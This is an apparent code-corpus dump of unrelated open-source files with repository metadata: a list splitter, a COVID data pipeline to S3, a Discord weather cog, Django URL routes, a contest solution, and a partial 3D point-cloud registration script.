"MIT"
] | 66 | 2015-09-30T02:43:32.000Z | 2022-03-31T02:26:52.000Z | py/List.RandomiseDivide.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
"MIT"
] | 48 | 2015-11-19T01:34:47.000Z | 2022-02-25T17:26:48.000Z | import System
pf_path = System.Environment.GetFolderPath(System.Environment.SpecialFolder.ProgramFilesX86)
import sys
sys.path.append(r'%s\IronPython 2.7\Lib' % pf_path)
import random
def tolist(x):
    if hasattr(x, '__iter__'):
        return x
    else:
        return [x]
l1, rat, seed = IN
l1 = tolist(l1)
r = random.Random()
r.seed(seed)
r.shuffle(l1)
len1 = len(l1)
OUT = []
if len(rat) < 2:
    rat.append(1.0 - rat[0])
if sum(rat) < 1.0:
    rat.append(1.0 - sum(rat))
start, end = 0, int(round(rat[0] * len1))
len2 = len(rat)
for i in xrange(len2):
    OUT.append(l1[start : end])
    start = end
    j = (i + 1) % len2
    end += int(round(rat[j] * len1))
if not OUT[-1]:
    del OUT[-1] | 21.966667 | 92 | 0.657056 | 118 | 659 | 3.618644 | 0.398305 | 0.014052 | 0.046838 | 0.051522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052252 | 0.157815 | 659 | 30 | 93 | 21.966667 | 0.717117 | 0 | 0 | 0 | 0 | 0 | 0.043939 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df722af80887b0cf34a0cea5105db11e889fcaf7 | 9,621 | py | Python | pipeline/dags/scripts/covid_pandas.py | jjjchens235/covid-compared | c917a3f25738d61d48ce92478c7ef4ef7511d0f9 | [
"MIT"
] | 4 | 2021-02-11T22:53:18.000Z | 2021-06-11T19:42:34.000Z | pipeline/dags/scripts/covid_pandas.py | jjjchens235/covid-compared | c917a3f25738d61d48ce92478c7ef4ef7511d0f9 | [
"MIT"
] | null | null | null | pipeline/dags/scripts/covid_pandas.py | jjjchens235/covid-compared | c917a3f25738d61d48ce92478c7ef4ef7511d0f9 | [
"MIT"
] | 1 | 2021-07-07T15:47:39.000Z | 2021-07-07T15:47:39.000Z | """
Using pandas library, move data from John Hopkin's github repo to AWS S3
Data source: https://github.com/CSSEGISandData/COVID-19/tree/master/csse_covid_19_data/csse_covid_19_time_series
"""
import pandas as pd
import numpy as np
import re
from random import randint
import s3fs
class CovidDF():
def __init__(self, df, title, gb, metric):
self.df = df
self.title = title
self.gb = gb
self.metric = metric
class CovidData:
CONFIRMED = 'Confirmed'
DEATHS = 'Deaths'
RECOVERED = 'Recovered'
GB_US = ['country', 'state', 'county']
GB_GLOBAL = ['country', 'state']
cols_to_rename = {'Country_Region': 'country', 'Country/Region': 'country', 'Province_State': 'state', 'Province/State': 'state', 'Admin2': 'county', 'UID': 'location_id', 'Long_': 'lon', 'Long': 'lon'}
def __init__(self):
"""
Initalize each of the dataframes from the 5 John Hopkins time series files
"""
BASE_URL = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series'
us_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_US.csv'
global_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_global.csv'
us_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_US.csv'
global_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_global.csv'
global_recovered_url = f'{BASE_URL}/time_series_covid19_recovered_global.csv'
location_url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/UID_ISO_FIPS_LookUp_Table.csv'
self.location = CovidDF(pd.read_csv(location_url, error_bad_lines=False), 'location', 'None', 'None')
self.us_confirmed = CovidDF(pd.read_csv(us_confirmed_url, error_bad_lines=False), 'us_confirmed', self.GB_US, self.CONFIRMED)
self.global_confirmed = CovidDF(pd.read_csv(global_confirmed_url, error_bad_lines=False), 'global_confirmed', self.GB_GLOBAL, self.CONFIRMED)
self.us_deaths = CovidDF(pd.read_csv(us_deaths_url, error_bad_lines=False), 'us_deaths', self.GB_US, self.DEATHS)
self.global_deaths = CovidDF(pd.read_csv(global_deaths_url, error_bad_lines=False), 'global_deaths', self.GB_GLOBAL, self.DEATHS)
self.global_recovered = CovidDF(pd.read_csv(global_recovered_url, error_bad_lines=False), 'global_recovered', self.GB_GLOBAL, self.RECOVERED)
self.DFs = [self.us_confirmed, self.global_confirmed, self.us_deaths, self.global_deaths, self.global_recovered]
def clean_time_series(self):
"""
Rename the cols of each dataframe, and rename all values of US -> United States
"""
for DF in self.DFs:
df = DF.df
df.rename(columns=self.cols_to_rename, inplace=True)
df.loc[df['country'] == 'US', 'country'] = 'United States'
def merge_missing_locations(self):
"""
The location file provided has a few missing locations (Yakutat, Alaska and Repatriated Travellers, Canada) as of 1/18/2021
Compare the US and Global confirmed files against the location file and add any missing locations to the location file
"""
#filter for the columns needed for combined key
df_gl = self.global_confirmed.df[['state', 'country', 'Lat', 'lon']]
df_us = self.us_confirmed.df[['state', 'country', 'Lat', 'lon', 'iso2', 'iso3', 'county']]
#create a combined key field in both us and global confirmed
df_gl['combined_key'] = (df_gl['state'] + ', ').fillna('') + df_gl['country']
df_us['combined_key'] = (df_us['county'] + ', ').fillna('') + (df_us['state'] + ', ').fillna('') + df_us['country']
#concat row-wise us and global confirmed
df_concat = pd.concat([df_gl, df_us], axis=0)
        #get the missing locations (.copy() avoids chained-assignment warnings)
        df_missing = df_concat.loc[~df_concat['combined_key'].isin(self.location.df['combined_key'])].copy()
        #create a random 6-digit id for each new combined_key (note: random,
        #so not guaranteed to avoid collisions with existing UIDs)
        df_missing['location_id'] = df_missing.groupby('combined_key')['combined_key'].transform(lambda x: randint(100000, 999999))
df_missing['Population'] = np.nan
df_missing = df_missing[['location_id', 'country', 'state', 'iso2', 'iso3', 'county', 'Population', 'Lat', 'lon', 'combined_key']]
self.location.df = pd.concat([self.location.df, df_missing], axis=0)
def clean_location(self):
""" Clean/update the location dataframe """
df = self.location.df
df = df.rename(columns=self.cols_to_rename)
df = df[['location_id', 'country', 'state', 'iso2', 'iso3','county', 'Population', 'Lat', 'lon']]
df.loc[df['country'] == 'US', 'country'] = 'United States'
        #have to manually recreate the combined_key field since the original field isn't consistently formatted
df['combined_key'] = (df['county'] + ', ').fillna('') + (df['state'] + ', ').fillna('') + df['country']
self.location.df = df
self.merge_missing_locations()
def get_date_cols(self, df):
""" Find the columns that match date regex """
pattern = re.compile(r'\d{1,2}/\d{1,2}/\d{2}')
date_cols = list(filter(pattern.match, df.columns))
return date_cols
def __convert_headers_to_datetime(self, df, date_cols):
"""
Convert the date columns from string -> datetime
"""
date_converted_cols = pd.to_datetime(date_cols, format='%m/%d/%y')
d = dict(zip(date_cols, date_converted_cols))
df = df.rename(columns=d)
return df
def __melt_cols(self, df, id_vars, metric):
""" Melt date columns to rows """
date_cols = self.get_date_cols(df)
cols_to_keep = id_vars + date_cols
df = df[cols_to_keep]
df = self.__convert_headers_to_datetime(df, date_cols)
df = df.melt(id_vars=id_vars, var_name='dt', value_name=metric)
return df
def melt_dfs(self):
""" For each df, melt datetime columns """
for DF in self.DFs:
DF.df = self.__melt_cols(DF.df, id_vars=DF.gb, metric=DF.metric).sort_values(DF.gb)
def __get_daily_totals(self, df, gb, metric):
"""
        Convert cumulative metric values to daily values
"""
df['diff'] = df.groupby(gb, dropna=False)[metric].diff()
#fill the first diff value with the original value
#https://stackoverflow.com/questions/25289132/pandas-diff-on-first-records-in-timeseries-missing-data-returns-nan
df[metric] = df['diff'].fillna(df[metric])
df.drop('diff', axis=1, inplace=True)
return df
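    # A minimal sketch of the diff/fillna trick above (toy data, assumed;
    # not part of the pipeline):
    #   s = pd.Series([3, 5, 9])   # cumulative counts
    #   s.diff()                   # -> [NaN, 2.0, 4.0]
    #   s.diff().fillna(s)         # -> [3.0, 2.0, 4.0], i.e. daily counts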
def get_daily_totals_dfs(self):
""" Converts cumsum totals to daily for all df's """
for DF in self.DFs:
DF.df = self.__get_daily_totals(DF.df, DF.gb, DF.metric)
def add_levels(self):
"""
        Update inconsistent territory levels.
        For example, China is reported only at country/state level,
        while France is reported both at country/state level and at country level.
        This means that summing up all the states to get each country's total
        would work for some countries (China),
        but would double count for other countries (France).
        To fix this, create a separate line for each missing level, e.g. a country-level line for China
"""
for DF in self.DFs:
df = DF.df
if 'global' in DF.title:
null_countries = df.loc[df['state'].isnull()]['country'].unique()
            # roll_countries have no distinct country line; all their rows include states, e.g. China, Australia
roll_countries = df.loc[~df['country'].isin(null_countries)]
#create distinct country line
rolled = roll_countries.groupby(['country', 'dt'])[roll_countries.columns[-1]].sum().reset_index()
rolled.insert(1, 'state', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
else:
rolled = df.loc[df['county'].notnull()].groupby(['country', 'state', 'dt'])[df.columns[-1]].sum().reset_index()
rolled.insert(3, 'county', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
def __save_csv(self, df, path, title, aws_key=None, aws_secret=None):
""" Save csv to either local or S3 """
f = f'{path}{title}_diff.csv'
if aws_key:
s3 = s3fs.S3FileSystem(key=aws_key, secret=aws_secret)
print(f'saving to s3: {f}')
f = s3.open(f, 'w')
print('finished s3 open')
df.to_csv(f, sep='\t', index=False)
def save_csv_local(self):
""" save as local file """
for DF in self.DFs:
self.__save_csv(DF.df, '/Users/jwong/Documents/', DF.title)
def save_csv_s3(self, aws_key, aws_secret, bucket):
""" save to s3 """
for DF in self.DFs:
self.__save_csv(DF.df, bucket, DF.title, aws_key, aws_secret)
#save location
self.__save_csv(self.location.df, bucket, self.location.title, aws_key, aws_secret)
def main(aws_key, aws_secret, bucket):
covid = CovidData()
covid.clean_time_series()
print(covid.us_confirmed.df.head())
covid.clean_location()
covid.melt_dfs()
print('made it to daily total')
covid.get_daily_totals_dfs()
print('made it add_levels')
covid.add_levels()
covid.save_csv_s3(aws_key, aws_secret, bucket)
if __name__ == '__main__':
    # main() needs AWS credentials and a bucket; pull them from the command
    # line so the script is runnable standalone (assumed invocation:
    # python covid_pandas.py <aws_key> <aws_secret> <bucket>)
    import sys
    main(*sys.argv[1:4])
| 46.033493 | 206 | 0.640682 | 1,342 | 9,621 | 4.378539 | 0.209389 | 0.015657 | 0.013274 | 0.016338 | 0.249149 | 0.198094 | 0.161504 | 0.145507 | 0.11998 | 0.078795 | 0 | 0.011852 | 0.228251 | 9,621 | 208 | 207 | 46.254808 | 0.779529 | 0.206216 | 0 | 0.133858 | 0 | 0.007874 | 0.182459 | 0.041616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125984 | false | 0 | 0.03937 | 0 | 0.259843 | 0.03937 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df731c4155c626f7babe8aacd42d7cca8b9a0894 | 595 | py | Python | cogs/utility/weather.py | austin1965/nuub_bot | 08fce234730ce506273199ca9c5c2a5f6e8e925a | [
"MIT"
] | null | null | null | cogs/utility/weather.py | austin1965/nuub_bot | 08fce234730ce506273199ca9c5c2a5f6e8e925a | [
"MIT"
] | null | null | null | cogs/utility/weather.py | austin1965/nuub_bot | 08fce234730ce506273199ca9c5c2a5f6e8e925a | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
from helpers.getWeather import getWeather
class Weather(commands.Cog):
"""
Weather Module
"""
def __init__(self, bot):
self.bot = bot
    @commands.command(help="Get Temperature of Specified Location")
async def weather(self, ctx, *, location):
location_temp_f, location_temp_c = getWeather(location)
        await ctx.send(
            f"The temperature of {location.title()} is {location_temp_f} F and {location_temp_c} C."
        )
def setup(bot):
bot.add_cog(Weather(bot))
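# Assumed usage elsewhere in the bot: this cog is registered with
# bot.load_extension("cogs.utility.weather"), which calls setup() above.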
| 24.791667 | 101 | 0.642017 | 74 | 595 | 4.986486 | 0.472973 | 0.130081 | 0.070461 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258824 | 595 | 23 | 102 | 25.869565 | 0.836735 | 0.023529 | 0 | 0 | 0 | 0 | 0.225092 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df740b38d28505e192ae196bb018bb75253e05d3 | 1,182 | py | Python | src/backoffice/urls.py | pwelzel/bornhack-website | af794e6a2fba06e09626259c7768feb30ff394be | [
"BSD-3-Clause"
] | null | null | null | src/backoffice/urls.py | pwelzel/bornhack-website | af794e6a2fba06e09626259c7768feb30ff394be | [
"BSD-3-Clause"
] | null | null | null | src/backoffice/urls.py | pwelzel/bornhack-website | af794e6a2fba06e09626259c7768feb30ff394be | [
"BSD-3-Clause"
] | null | null | null | from django.urls import path, include
from .views import *
app_name = 'backoffice'
urlpatterns = [
path('', BackofficeIndexView.as_view(), name='index'),
path('product_handout/', ProductHandoutView.as_view(), name='product_handout'),
path('badge_handout/', BadgeHandoutView.as_view(), name='badge_handout'),
path('ticket_checkin/', TicketCheckinView.as_view(), name='ticket_checkin'),
path('public_credit_names/', ApproveNamesView.as_view(), name='public_credit_names'),
path('merchandise_orders/', MerchandiseOrdersView.as_view(), name='merchandise_orders'),
path('merchandise_to_order/', MerchandiseToOrderView.as_view(), name='merchandise_to_order'),
path('manage_proposals/', include([
path('', ManageProposalsView.as_view(), name='manage_proposals'),
path('speakers/<uuid:pk>/', SpeakerProposalManageView.as_view(), name='speakerproposal_manage'),
path('events/<uuid:pk>/', EventProposalManageView.as_view(), name='eventproposal_manage'),
])),
path('village_orders/', VillageOrdersView.as_view(), name='village_orders'),
path('village_to_order/', VillageToOrderView.as_view(), name='village_to_order'),
]
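# e.g. with app_name = 'backoffice', templates and views can resolve these
# routes by namespaced name: reverse('backoffice:product_handout')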
| 49.25 | 104 | 0.72758 | 128 | 1,182 | 6.414063 | 0.367188 | 0.087698 | 0.146163 | 0.051157 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107445 | 1,182 | 23 | 105 | 51.391304 | 0.778199 | 0 | 0 | 0 | 0 | 0 | 0.331922 | 0.03641 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df7ebc0c91b4ff97fcdcda3f164a6e33050dcd41 | 656 | py | Python | python/hps.py | TenType/competition | 1715c79c88992e4603b327f962f44eb5bffcb801 | [
"MIT"
] | 1 | 2022-02-05T02:11:37.000Z | 2022-02-05T02:11:37.000Z | python/hps.py | TenType/competition | 1715c79c88992e4603b327f962f44eb5bffcb801 | [
"MIT"
] | null | null | null | python/hps.py | TenType/competition | 1715c79c88992e4603b327f962f44eb5bffcb801 | [
"MIT"
] | null | null | null | n = int(input())
cow1 = []
cow2 = []
# all 6 possible orderings of the three gestures; each list is a candidate
# ranking used to score the rounds below
combinations = [[1, 2, 3], [1, 3, 2], [2, 1, 3], [2, 3, 1], [3, 1, 2], [3, 2, 1]]
results = []
for i in range(0, n):
temp1, temp2 = map(int, input().split())
cow1.append(temp1)
cow2.append(temp2)
# print(cow1)
# print(cow2)
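# Brute force: for each of the 6 candidate orderings, count how many rounds
# cow1 would win under that ordering, then report the best case.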
for j in range(0, 6):
result = 0
for k in range(0, n):
index1 = combinations[j].index(cow1[k])
index2 = combinations[j].index(cow2[k])
# print(j, index1, index2)
        # cow1 wins when its gesture sits exactly one position ahead of
        # cow2's in the current (cyclic) ordering
        if (index1 == 0 and index2 == 1) or (index1 == 1 and index2 == 2) or (index1 == 2 and index2 == 0):
            result += 1
# print(j, index1, index2, " Winner")
results.append(result)
# print(results)
print(max(results))
| 24.296296 | 101 | 0.585366 | 110 | 656 | 3.490909 | 0.3 | 0.015625 | 0.0625 | 0.020833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102857 | 0.199695 | 656 | 26 | 102 | 25.230769 | 0.628571 | 0.150915 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df7f6e381001b44fc6f3924b2ba0c8c7b78631c0 | 22,348 | py | Python | registerwithkeyframes.py | susu1210/3d_object_reconstruction | e8e9674f728a21c66b9766f5367850d1a65c84c2 | [
"MIT"
] | 2 | 2021-07-17T02:52:09.000Z | 2021-08-31T06:39:29.000Z | registerwithkeyframes.py | susu1210/3d_object_reconstruction | e8e9674f728a21c66b9766f5367850d1a65c84c2 | [
"MIT"
] | null | null | null | registerwithkeyframes.py | susu1210/3d_object_reconstruction | e8e9674f728a21c66b9766f5367850d1a65c84c2 | [
"MIT"
] | null | null | null | """
registerSegments.py
---------------
Main function for registering (aligning) colored point clouds with ICP/feature
matching as well as pose graph optimization
"""
# import png
from PIL import Image
import csv
import open3d as o3d
import pymeshlab
import numpy as np
import cv2
import os
import glob
from utils.ply import Ply
from utils.camera import *
from registration import icp, feature_registration, match_ransac, rigid_transform_3D
from tqdm import trange
from pykdtree.kdtree import KDTree
import time
import sys
from config.registrationParameters import *
from config.segmentationParameters import SEG_INTERVAL, STARTFRAME, SEG_METHOD,ANNOTATION_INTERVAL
from config.DataAcquisitionParameters import SERIAL,camera_intrinsics
import pandas as pd
# Set up parameters for registration
# voxel sizes use to down sample raw pointcloud for fast ICP
voxel_size = VOXEL_SIZE
max_correspondence_distance_coarse = voxel_size * 15
max_correspondence_distance_fine = voxel_size * 1.5
# Set up parameters for post-processing
# Voxel size for the complete mesh
voxel_Radius = VOXEL_R
# Point considered an outlier if more than inlier_Radius away from other points
inlier_Radius = voxel_Radius * 2.5
# search for up to N frames for registration, odometry only N=1, all frames N = np.inf
N_Neighbours = K_NEIGHBORS
def post_process(originals, voxel_Radius, inlier_Radius):
"""
    Merge segments so that new points are not added to the merged
    model if they lie within voxel_Radius of existing points, and keep a vote
    recording whether each point was confirmed (within inlier_Radius of
    incoming points) at the time of the merge
    Parameters
    ----------
    originals : List of open3d.PointCloud instances
        6D pointclouds of the segments transformed into the world frame
    voxel_Radius : float
        Reject a duplicate point if the new point lies within the voxel radius
        of an existing point
    inlier_Radius : float
        Point considered an outlier if more than inlier_Radius away from any
        other points
    Returns
    ----------
    points : (n,3) float
        The (x,y,z) of the processed and filtered pointcloud
    colors : (n,3) float
        The (r,g,b) color information corresponding to the points
    vote : (n, ) int
        The number of votes (duplicate points seen within voxel_Radius) each
        processed point has received
"""
for point_id in trange(len(originals)):
if point_id == 0:
vote = np.zeros(len(originals[point_id].points))
points = np.array(originals[point_id].points,dtype = np.float64)
colors = np.array(originals[point_id].colors,dtype = np.float64)
else:
points_temp = np.array(originals[point_id].points,dtype = np.float64)
colors_temp = np.array(originals[point_id].colors,dtype = np.float64)
dist , index = nearest_neighbour(points_temp, points)
new_points = np.where(dist > voxel_Radius)
points_temp = points_temp[new_points]
colors_temp = colors_temp[new_points]
inliers = np.where(dist < inlier_Radius)
vote[(index[inliers],)] += 1
vote = np.concatenate([vote, np.zeros(len(points_temp))])
points = np.concatenate([points, points_temp])
colors = np.concatenate([colors, colors_temp])
return (points,colors,vote)
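# Downstream (see the main block below), only points with vote > 1 -- i.e.
# points confirmed by at least two overlapping segments -- are kept in the
# final mesh.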
def surface_reconstruction_screened_poisson(path):
ms = pymeshlab.MeshSet()
ms.load_new_mesh(path)
ms.compute_normals_for_point_sets()
ms.surface_reconstruction_screened_poisson()
ms.save_current_mesh(path)
filtered_mesh = o3d.io.read_point_cloud(path)
return filtered_mesh
def full_registration(pcds_down,cads,depths, max_correspondence_distance_coarse,max_correspondence_distance_fine):
"""
perform pairwise registration and build pose graph for up to N_Neighbours
Parameters
----------
    pcds_down : List of open3d.PointCloud instances
        Downsampled 6D pointclouds of the unaligned segments
max_correspondence_distance_coarse : float
The max correspondence distance used for the course ICP during the process
of coarse to fine registration
max_correspondence_distance_fine : float
The max correspondence distance used for the fine ICP during the process
of coarse to fine registration
Returns
----------
    pose_graph: an open3d.PoseGraph instance
        Stores the pose of each segment in the nodes and pairwise constraints in the edges
"""
global N_Neighbours
pose_graph = o3d.pipelines.registration.PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))
n_pcds = len(pcds_down)
for source_id in trange(n_pcds):
for target_id in range(source_id + 1, min(source_id + N_Neighbours,n_pcds)):
# derive pairwise registration through feature matching
color_src = cads[source_id]
depth_src = depths[source_id]
color_dst = cads[target_id]
depth_dst = depths[target_id]
res = feature_registration((color_src, depth_src),
(color_dst, depth_dst))
if res is None:
# if feature matching fails, perform pointcloud matching
transformation_icp, information_icp = icp(
pcds_down[source_id], pcds_down[target_id],max_correspondence_distance_coarse,
max_correspondence_distance_fine, method = RECON_METHOD)
else:
transformation_icp = res
information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(
pcds_down[source_id], pcds_down[target_id], max_correspondence_distance_fine,
transformation_icp)
information_icp *= 1.2 ** (target_id - source_id - 1)
if target_id == source_id + 1:
# odometry
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(np.linalg.inv(odometry)))
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=False))
else:
# loop closure
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=True))
return pose_graph
def joints_full_registration(pcds_down, LinkOrientations, LinkPositions):
"""
perform pairwise registration using robot end-effector poses and build pose graph
Parameters
----------
    pcds_down : List of open3d.PointCloud instances
        Downsampled 6D pointclouds of the unaligned segments
    LinkOrientations : List of end-effector orientations
    LinkPositions : List of end-effector positions
Returns
----------
    pose_graph: an open3d.PoseGraph instance
        Stores the pose of each segment in the nodes and pairwise constraints in the edges
"""
global N_Neighbours
pose_graph = o3d.pipelines.registration.PoseGraph()
odometry = np.identity(4)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(odometry))
n_pcds = len(pcds_down)
for source_id in trange(n_pcds):
for target_id in range(source_id + 1, min(source_id + N_Neighbours, n_pcds)):
R1 , R2 = LinkOrientations[source_id] , LinkOrientations[target_id]
T1 , T2 = LinkPositions[source_id] , LinkPositions[target_id]
transformation_icp = calculate_transformation(R1 , R2, T1, T2)
information_icp = o3d.pipelines.registration.get_information_matrix_from_point_clouds(
pcds_down[source_id], pcds_down[target_id], max_correspondence_distance_fine,
transformation_icp)
if target_id == source_id + 1:
# odometry
odometry = np.dot(transformation_icp, odometry)
pose_graph.nodes.append(o3d.pipelines.registration.PoseGraphNode(np.linalg.inv(odometry)))
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=False))
else:
# loop closure
pose_graph.edges.append(o3d.pipelines.registration.PoseGraphEdge(source_id, target_id,
transformation_icp, information_icp, uncertain=True))
return pose_graph
def calculate_transformation(R1, R2, T1, T2):
    # relative rotation taking pose 1 into pose 2: R = R2 * R1^-1
    R = np.dot(R2, np.linalg.inv(R1))
    # corresponding relative translation
    T = T2 - np.dot(T1, np.dot(np.linalg.inv(R1).T, R2.T))
    # assemble a 4x4 homogeneous transform
    transformation_icp = [[R[0][0], R[0][1], R[0][2], T[0]],
                          [R[1][0], R[1][1], R[1][2], T[1]],
                          [R[2][0], R[2][1], R[2][2], T[2]],
                          [0, 0, 0, 1]]
    return transformation_icp
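# A quick sanity check of the relative-transform math above (toy poses,
# assumed values; not part of the pipeline):
#   R1 = R2 = np.eye(3); T1 = np.zeros(3); T2 = np.array([0.0, 0.0, 0.1])
#   calculate_transformation(R1, R2, T1, T2)
#   -> identity rotation with a pure 0.1 translation in z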
def load_robot_joints(path, keyframe_ids):
robot_joints = pd.read_csv(path+"/robot_joints.csv", index_col='filenames')
LinkR = robot_joints['LinkRotationMatrices']
LinkPositions = robot_joints['LinkPositions']
Rs=[]
Ts=[]
for filename in keyframe_ids:
R = list(map(float, LinkR[filename][1:len(LinkR[filename]) - 1].split(',')))
R = np.reshape(np.array(R), [3, 3])
T = np.array(list(map(float, LinkPositions[filename][1:len(LinkPositions[filename]) - 1].split(','))))
Rs.append(R)
Ts.append(T)
return Rs, Ts
def load_object_states(path, keyframe_ids):
robot_joints = pd.read_csv(path+"/robot_joints.csv", index_col='filenames')
ObjectR = robot_joints['ObjectRotationMatrices']
ObjectPositions = robot_joints['ObjectPositions']
Rs=[]
Ts=[]
for filename in keyframe_ids:
R = list(map(float, ObjectR[filename][1:len(ObjectR[filename]) - 1].split(',')))
R= np.reshape(np.array(R), [3, 3])
T = np.array(list(map(float, ObjectPositions[filename][1:len(ObjectPositions[filename]) - 1].split(','))))
Rs.append(R)
Ts.append(T)
return Rs, Ts
def load_colordepth(path,Filename):
mask_path = path + SEG_METHOD+'_results/%s.png' % (Filename)
    # fall back to the hand-annotated mask below if the segmentation result for this frame is missing
# mask_path = path + 'annotations/%s.png' % (Filename)
exist = os.path.isfile(mask_path)
if exist:
mask = cv2.imread(mask_path, 0)
else:
mask_path = path + 'annotations/%s.png' % (Filename)
mask = cv2.imread(mask_path, 0)
img_file = path + 'cad/%s.jpg' % (Filename)
cad = cv2.imread(img_file)
cad = cv2.cvtColor(cad, cv2.COLOR_BGR2RGB)
# cv2.imshow("cad", cad)
# cv2.imshow("mask", mask)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
segmented = cv2.bitwise_and(cad,cad,mask = mask)
# if Filename<=1000:
# bbx = np.zeros_like(mask,dtype='uint8')
# bbx[180:300,235:400] = 1
# segmented = cv2.bitwise_and(segmented, segmented, mask=bbx)
# cv2.imshow("segmented", segmented)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
# color_thr = 125
# color_mask = np.asarray(np.logical_and((segmented[:,:,0]>=color_thr),
# np.logical_and( (segmented[:,:,1]>=color_thr),(segmented[:,:,2]>=color_thr))),dtype=np.uint8)*255
# color_mask = np.asarray(np.logical_xor(mask, color_mask), dtype=np.uint8)*255
# segmented = cv2.bitwise_and(segmented, segmented, mask=color_mask)
# cv2.imshow("segmented", segmented)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
depth_file = path + 'depth/%s.png' % (Filename)
depth = Image.open(depth_file)
depth = np.array(depth, dtype=np.uint16)
if SEG_METHOD == "MaskRCNN":
depth_thr = 0.9 * 65535
depth_mask = np.asarray(depth>= depth_thr, dtype=np.uint8) * 255
depth_mask = np.asarray(np.logical_xor(mask, depth_mask), dtype=np.uint8) * 255
segmented = cv2.bitwise_and(segmented, segmented, mask=depth_mask)
# cv2.imshow("segmented", segmented)
# cv2.waitKey(0)
# cv2.destroyAllWindows()
pointcloud = convert_depth_frame_to_pointcloud(depth, SERIAL, camera_intrinsics)
return (segmented, depth, pointcloud)
def select_keyframes(path):
keyframe_ids = []
Filename = SEG_INTERVAL + STARTFRAME
Matched = True
try:
while True:
if Matched:
interval = int(KEYFRAME_INTERVAL/SEG_INTERVAL)*SEG_INTERVAL
else:
interval -= SEG_INTERVAL
color_src, mask_src, pointcloud_src = load_colordepth(path,Filename)
color_dst, mask_dst, pointcloud_dst = load_colordepth(path,Filename + interval)
res = feature_registration((color_src, pointcloud_src),
(color_dst, pointcloud_dst))
if res is not None:
if Filename not in keyframe_ids:
keyframe_ids.append(Filename)
keyframe_ids.append(Filename+interval)
Filename += interval
Matched = True
continue
else:
segmented_mask_src = cv2.cvtColor(color_src, cv2.COLOR_BGR2GRAY)
segmented_mask_dst = cv2.cvtColor(color_dst, cv2.COLOR_BGR2GRAY)
segmented_mask_src[mask_src==0] = 0
segmented_mask_dst[mask_dst==0] = 0
src_show = pointcloud_src[segmented_mask_src>0]
dst_show = pointcloud_dst[segmented_mask_dst>0]
source = o3d.geometry.PointCloud()
source.points = o3d.utility.Vector3dVector(src_show)
source.colors = o3d.utility.Vector3dVector(color_src[segmented_mask_src>0])
target = o3d.geometry.PointCloud()
target.points = o3d.utility.Vector3dVector(dst_show)
target.colors = o3d.utility.Vector3dVector(color_dst[segmented_mask_dst>0])
voxel_radius = [ 0.001, 0.001, 0.001 ]
max_iter = [ 80, 80, 80 ]
current_transformation = np.identity(4)
for scale in range(3):
iter = max_iter[scale]
r = voxel_radius[scale]
